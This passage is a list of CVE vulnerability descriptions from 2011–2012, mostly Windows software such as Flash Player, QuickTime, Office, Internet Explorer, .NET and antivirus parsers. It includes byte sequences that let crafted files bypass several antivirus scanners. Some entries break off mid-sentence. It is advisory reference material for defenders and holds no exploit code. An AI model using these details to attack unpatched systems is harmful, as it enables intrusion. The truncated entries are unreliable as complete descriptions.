showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1433] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \4a\46\49\46 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1432] The Microsoft EXE file parser in Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \57\69\6E\5A\69\70 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1420] The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command Antivirus 5.2.11.5, F-Prot Antivirus 4.6.2.117, Fortinet Antivirus 4.2.254.0, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Panda Antivirus 10.0.2.7, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \7fELF character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-0779] Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux [CVE-2012-0773] The NetStream class in Adobe Flash Player before 10.3.183.18 and 11.x before 11.2.202.228 on Windows, Mac OS X, and Linux [CVE-2012-0772] An unspecified ActiveX control in Adobe Flash Player before 10.3.183.18 and 11.x before 11.2.202.228, and AIR before 3.2.0.2070, on Windows does not properly perform URL security domain checking, which allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors. [CVE-2012-0769] Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0768] The Matrix3D component in Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0767] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0756] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0755] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0754] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0753] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0752] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0751] The ActiveX control in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2012-0733] IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1, when Integrated Windows authentication is used, allows remote authenticated users to obtain administrative privileges by hijacking a session associated with the service account. [CVE-2012-0713] Unspecified vulnerability in the XML feature in IBM DB2 9.7 before FP6 on Linux, UNIX, and Windows allows remote authenticated users to read arbitrary XML files via unknown vectors. [CVE-2012-0669] Buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file with Sorenson encoding. [CVE-2012-0667] Integer signedness error in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTVR movie file. [CVE-2012-0666] Stack-based buffer overflow in the plugin in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTMovie object. [CVE-2012-0664] Heap-based buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted text track in a movie file. [CVE-2012-0663] Multiple stack-based buffer overflows in Apple QuickTime before 7.7.2 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TeXML file. [CVE-2012-0584] The Internationalized Domain Name (IDN) feature in Apple Safari before 5.1.4 on Windows does not properly restrict the characters in URLs, which allows remote attackers to spoof a domain name via unspecified homoglyphs. [CVE-2012-0519] Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.2.0.2, when running on Windows, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2012-0472] The cairo-dwrite implementation in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9, when certain Windows Vista and Windows 7 configurations are used, does not properly restrict font-rendering attempts, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors. [CVE-2012-0454] Use-after-free vulnerability in Mozilla Firefox 4.x through 10.0, Firefox ESR 10.x before 10.0.3, Thunderbird 5.0 through 10.0, Thunderbird ESR 10.x before 10.0.3, and SeaMonkey before 2.8 on 32-bit Windows 7 platforms allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors involving use of the file-open dialog in a child window, related to the IUnknown_QueryService function in the Windows shlwapi.dll library. [CVE-2012-0447] Mozilla Firefox 4.x through 9.0, Thunderbird 5.0 through 9.0, and SeaMonkey before 2.7 do not properly initialize data for image/vnd.microsoft.icon images, which allows remote attackers to obtain potentially sensitive information by reading a PNG image that was created through conversion from an ICO image. [CVE-2012-0430] Unspecified vulnerability in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 on Windows allows remote attackers to obtain an administrator cookie and bypass authorization checks via unknown vectors. [CVE-2012-0429] dhost in NetIQ eDirectory 8.8.6.x before 8.8.6.7 and 8.8.7.x before 8.8.7.2 on Windows allows remote authenticated users to cause a denial of service (daemon crash) via crafted characters in an HTTP request. [CVE-2012-0418] Unspecified vulnerability in the client in Novell GroupWise 8.0 before Support Pack 3 and 2012 before Support Pack 1 on Windows allows user-assisted remote attackers to execute arbitrary code via a crafted file. [CVE-2012-0265] Stack-based buffer overflow in Apple QuickTime before 7.7.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted pathname for a file. [CVE-2012-0185] Heap-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 Gold and SP1, Excel Viewer, and Office Compatibility Pack SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted spreadsheet that triggers incorrect handling of memory during opening, aka "Excel MergeCells Record Heap Overflow Vulnerability." [CVE-2012-0184] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0183] Microsoft Word 2003 SP3 and 2007 SP2 and SP3, Office 2008 and 2011 for Mac, and Office Compatibility Pack SP2 and SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted RTF data, aka "RTF Mismatch Vulnerability." [CVE-2012-0182] Microsoft Word 2007 SP2 and SP3 does not properly handle memory during the parsing of Word documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "Word PAPX Section Corruption Vulnerability." [CVE-2012-0177] Heap-based buffer overflow in the Office Works File Converter in Microsoft Office 2007 SP2, Works 9, and Works 6-9 File Converter allows remote attackers to execute arbitrary code via a crafted Works (aka .wps) file, aka "Office WPS Converter Heap Overflow Vulnerability." [CVE-2012-0172] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "VML Style Remote Code Execution Vulnerability." [CVE-2012-0171] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "SelectAll Remote Code Execution Vulnerability." [CVE-2012-0170] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnReadyStateChange Remote Code Execution Vulnerability." [CVE-2012-0169] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "JScript9 Remote Code Execution Vulnerability." [CVE-2012-0168] Microsoft Internet Explorer 6 through 9 allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document that is not properly handled during a "Print table of links" print operation, aka "Print Feature Remote Code Execution Vulnerability." [CVE-2012-0167] Heap-based buffer overflow in the Office GDI+ library in Microsoft Office 2003 SP3 and 2007 SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted EMF image in an Office document, aka "GDI+ Heap Overflow Vulnerability." [CVE-2012-0163] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate function parameters, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Parameter Validation Vulnerability." [CVE-2012-0162] Microsoft .NET Framework 4 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Buffer Allocation Vulnerability." [CVE-2012-0161] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly handle an unspecified exception during use of partially trusted assemblies to serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0160] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0158] The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0155] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "VML Remote Code Execution Vulnerability." [CVE-2012-0147] Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 does not properly configure the default web site, which allows remote attackers to obtain sensitive information via a crafted HTTPS request, aka "Unfiltered Access to UAG Default Website Vulnerability." [CVE-2012-0146] Open redirect vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "UAG Blind HTTP Redirect Vulnerability." [CVE-2012-0145] Cross-site scripting (XSS) vulnerability in wizardlist.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in wizardlist.aspx Vulnerability." [CVE-2012-0144] Cross-site scripting (XSS) vulnerability in themeweb.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in themeweb.aspx Vulnerability." [CVE-2012-0143] Microsoft Excel 2003 SP3 and Office 2008 for Mac do not properly handle memory during the opening of files, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Memory Corruption Using Various Modified Bytes Vulnerability." [CVE-2012-0142] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0141] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0138] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0137. [CVE-2012-0137] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0138. [CVE-2012-0136] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0105] Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization 4.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Windows Guest Additions. [CVE-2012-0020] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0019] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0020, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0018] Microsoft Visio Viewer 2010 Gold and SP1 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "VSD File Format Memory Corruption Vulnerability." [CVE-2012-0017] Cross-site scripting (XSS) vulnerability in inplview.aspx in Microsoft SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in inplview.aspx Vulnerability." [CVE-2012-0016] Untrusted search path vulnerability in Microsoft Expression Design [CVE-2012-0015] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly calculate the length of an unspecified buffer, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Heap Corruption Vulnerability." [CVE-2012-0014] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.1.10111, does not properly restrict access to memory associated with unmanaged objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Unmanaged Objects Vulnerability." [CVE-2012-0012] Microsoft Internet Explorer 9 does not properly handle the creation and initialization of string objects, which allows remote attackers to read data from arbitrary process-memory locations via a crafted web site, aka "Null Byte Information Disclosure Vulnerability." [CVE-2012-0011] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "HTML Layout Remote Code Execution Vulnerability." [CVE-2012-0010] Microsoft Internet Explorer 6 through 9 does not properly perform copy-and-paste operations, which allows user-assisted remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Copy and Paste Information Disclosure Vulnerability." [CVE-2012-0008] Untrusted search path vulnerability in Microsoft Visual Studio 2008 SP1, 2010, and 2010 SP1 allows local users to gain privileges via a Trojan horse add-in in an unspecified directory, aka "Visual Studio Add-In Vulnerability." [CVE-2012-0007] The Microsoft Anti-Cross Site Scripting (AntiXSS) Library 3.x and 4.0 does not properly evaluate characters after the detection of a Cascading Style Sheets (CSS) escaped character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML input, aka "AntiXSS Library Bypass Vulnerability." [CVE-2011-5127] Directory traversal vulnerability in Blue Coat Reporter 9.x before 9.2.4.13, 9.2.5.x before 9.2.5.1, and 9.3 before 9.3.1.2 on Windows allows remote attackers to read arbitrary files, and consequently execute arbitrary code, via an unspecified HTTP request. [CVE-2011-5049] MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306. [CVE-2011-5012] Heap-based buffer overflow in the Reflection FTP Client (rftpcom.dll 7.2.0.106 and possibly other versions), as used in Attachmate Reflection 2008, Reflection 2011 R1 before 15.3.2.569 and R1 SP1 before, Reflection 2011 R2 before 15.4.1.327, Reflection Windows Client 7.2 SP1 before hotfix 7.2.1186, and Reflection 14.1 SP1 before 14.1.1.206 allows remote FTP servers to execute arbitrary code via a long directory name in a response to a LIST command. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4694] Unspecified vulnerability in Adobe Flash Player 11.1.102.55 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted SWF file, as demonstrated by the second of two vulnerabilities exploited by the Intevydis vd_adobe_fp module in VulnDisco Step Ahead (SA). NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4693] Unspecified vulnerability in Adobe Flash Player 11.1.102.55 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted SWF file, as demonstrated by the first of two vulnerabilities exploited by the Intevydis vd_adobe_fp module in VulnDisco Step Ahead (SA). NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4689] Microsoft Internet Explorer 6 through 9 does not prevent capture of data about the times of Same Origin Policy violations during IFRAME loading attempts, which makes it easier for remote attackers to determine whether a document exists in the browser cache via crafted JavaScript code. [CVE-2011-4373] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4370 and CVE-2011-4372. [CVE-2011-4372] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4370 and CVE-2011-4373. [CVE-2011-4371] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via unspecified vectors. [CVE-2011-4370] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4372 and CVE-2011-4373. [CVE-2011-4369] Unspecified vulnerability in the PRC component in Adobe Reader and Acrobat 9.x before 9.4.7 on Windows, Adobe Reader and Acrobat 9.x through 9.4.6 on Mac OS X, Adobe Reader and Acrobat 10.x through 10.1.1 on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. [CVE-2011-4187] Buffer overflow in the GetDriverSettings function in nipplib.dll in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a long realm field, a different vulnerability than CVE-2011-3173. [CVE-2011-4186] Heap-based buffer overflow in nipplib.dll in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a crafted client-file-name parameter in a printer-url, a different vulnerability than CVE-2011-1705. [CVE-2011-4185] The GetPrinterURLList2 method in the ActiveX control in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2008-2431 and CVE-2008-2436. [CVE-2011-3649] Mozilla Firefox 7.0 and Thunderbird 7.0, when the Direct2D (aka D2D) API is used on Windows in conjunction with the Azure graphics back-end, allow remote attackers to bypass the Same Origin Policy, and obtain sensitive image data from a different domain, by inserting this data into a canvas. NOTE: this issue exists because of a CVE-2011-2986 regression. [CVE-2011-3640] DISPUTED Untrusted search path vulnerability in Mozilla Network Security Services (NSS), as used in Google Chrome before 17 on Windows and Mac OS X, might allow local users to gain privileges via a Trojan horse pkcs11.txt file in a top-level directory. NOTE: the vendor's response was "Strange behavior, but we're not treating this as a security bug." [CVE-2011-3516] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-3417] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0, when sliding expiry is enabled, does not properly handle cached content, which allows remote attackers to obtain access to arbitrary user accounts via a crafted URL, aka "ASP.NET Forms Authentication Ticket Caching Vulnerability." [CVE-2011-3416] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote authenticated users to obtain access to arbitrary user accounts via a crafted username, aka "ASP.Net Forms Authentication Bypass Vulnerability." [CVE-2011-3415] Open redirect vulnerability in the Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted return URL, aka "Insecure Redirect in .NET Form Authentication Vulnerability." [CVE-2011-3414] The CaseInsensitiveHashProvider.getHashCode function in the HashTable implementation in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka "Collisions in HashTable May Cause DoS Vulnerability." [CVE-2011-3413] Microsoft PowerPoint 2007 SP2 [CVE-2011-3412] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect memory handling, aka "Publisher Memory Corruption Vulnerability." [CVE-2011-3411] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Invalid Pointer Vulnerability." [CVE-2011-3410] Array index error in Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Out-of-bounds Array Index Vulnerability." [CVE-2011-3404] Microsoft Internet Explorer 6 through 9 does not properly use the Content-Disposition HTTP header to control rendering of the HTTP response body, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Content-Disposition Information Disclosure Vulnerability." [CVE-2011-3403] Microsoft Excel 2003 SP3 and Office 2004 for Mac do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet, aka "Record Memory Corruption Vulnerability." [CVE-2011-3396] Untrusted search path vulnerability in Microsoft PowerPoint 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "PowerPoint Insecure Library Loading Vulnerability." [CVE-2011-3330] Buffer overflow in the UnitelWay Windows Device Driver, as used in Schneider Electric Unity Pro 6 and earlier, OPC Factory Server 3.34, Vijeo Citect 7.20 and earlier, Telemecanique Driver Pack 2.6 and earlier, Monitor Pro 7.6 and earlier, and PL7 Pro 4.5 and earlier, allows local users, and possibly remote attackers, to execute arbitrary code via an unspecified system parameter. [CVE-2011-3310] The Home Page component in Cisco CiscoWorks Common Services before 4.1 on Windows, as used in CiscoWorks LAN Management Solution, Cisco Security Manager, Cisco Unified Service Monitor, Cisco Unified Operations Manager, CiscoWorks QoS Policy Manager, and CiscoWorks Voice Manager, allows remote authenticated users to execute arbitrary commands via a crafted URL, aka Bug IDs CSCtq48990, CSCtq63992, CSCtq64011, CSCtq64019, CSCtr23090, and CSCtt25535. [CVE-2011-3260] Buffer overflow in OfficeImport in Apple iOS before 5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Word document. [CVE-2011-3251] Apple QuickTime before 7.7.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted TKHD atoms in a QuickTime movie file. [CVE-2011-3247] Integer overflow in Apple QuickTime before 7.7.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT file. [CVE-2011-3243] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5 and Safari before 5.1.1, allows remote attackers to inject arbitrary web script or HTML via vectors involving inactive DOM windows. [CVE-2011-3185] gtkutils.c in Pidgin before 2.10.0 on Windows allows user-assisted remote attackers to execute arbitrary programs via a file: URL in a message. [CVE-2011-3098] Google Chrome before 19.0.1084.46 on Windows uses an incorrect search path for the Windows Media Player plug-in, which might allow local users to gain privileges via a Trojan horse plug-in in an unspecified directory. [CVE-2011-3072] Google Chrome before 18.0.1025.151 allows remote attackers to bypass the Same Origin Policy via vectors related to pop-up windows. [CVE-2011-2986] Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products, when the Direct2D (aka D2D) API is used on Windows, allows remote attackers to bypass the Same Origin Policy, and obtain sensitive image data from a different domain, by inserting this data into a canvas. [CVE-2011-2977] Bugzilla 3.6.x before 3.6.6, 3.7.x, 4.0.x before 4.0.2, and 4.1.x before 4.1.3 on Windows does not delete the temporary files associated with uploaded attachments, which allows local users to obtain sensitive information by reading these files. NOTE: this issue exists because of a regression in 3.6. [CVE-2011-2836] Google Chrome before 14.0.835.163 does not require Infobar interaction before use of the Windows Media Player plug-in, which makes it easier for remote attackers to have an unspecified impact via crafted Flash content. [CVE-2011-2822] Google Chrome before 13.0.782.215 on Windows does not properly parse URLs located on the command line, which has unspecified impact and attack vectors. [CVE-2011-2806] Google Chrome before 13.0.782.215 on Windows does not properly handle vertex data, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2779] Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 uses world-writable permissions for exported report files, which allows local users to change or delete log data by modifying a file, a different vulnerability than CVE-2011-0770. [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-2678] The Cisco VPN Client 5.0.7.0240 and 5.0.7.0290 on 64-bit Windows platforms uses weak permissions (NT AUTHORITY\INTERACTIVE:F) for cvpnd.exe, which allows local users to gain privileges by replacing this executable file with an arbitrary program, aka Bug ID CSCtn50645. NOTE: this vulnerability exists because of a CVE-2007-4415 regression. [CVE-2011-2664] Unspecified vulnerability in Check Point Multi-Domain Management / Provider-1 NGX R65, R70, R71, and R75, and SmartCenter during installation on non-Windows machines, allows local users on the MDS system to overwrite arbitrary files via unknown vectors. [CVE-2011-2618] Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via web script that moves a (1) AUDIO element or (2) VIDEO element between windows. [CVE-2011-2617] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via vectors related to selecting a text node, and closed pop-up windows, removed pop-up windows, and IFRAME elements. [CVE-2011-2604] The Intel G41 driver 6.14.10.5355 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2602] The NVIDIA Geforce 310 driver 6.14.12.7061 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2600] The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system crash) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2598] The WebGL implementation in Mozilla Firefox 4.x allows remote attackers to obtain screenshots of the windows of arbitrary desktop applications via vectors involving an SVG filter, an IFRAME element, and uninitialized data in graphics memory. [CVE-2011-2462] Unspecified vulnerability in the U3D component in Adobe Reader and Acrobat 10.1.1 and earlier on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. [CVE-2011-2460] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, and CVE-2011-2459. [CVE-2011-2459] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, and 